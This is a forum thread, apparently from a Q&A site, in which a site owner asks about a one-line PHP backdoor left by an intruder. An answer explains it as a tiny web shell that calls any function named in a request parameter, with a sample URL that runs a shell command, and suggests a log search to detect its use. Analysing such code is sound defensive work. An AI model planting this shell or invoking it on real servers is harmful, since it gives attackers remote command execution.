Found codes left by hacker but don't understand what it does

Question

I found a line of script left by the hacker in one of my PHP files. And it reads like this:

<?php

($_=@$_GET[2]).@$_($_POST[1]);

?>

Can anyone please give some hints about what this line of code does? Thank you

Answer 1

I already posted it as a comment since the question was on hold, here now as an answer:

It's a PHP shell. If you rewrite it to <?php ($_=@$_GET[2]).@$_($_GET[1]); ?> the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.

You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.

Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.

/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.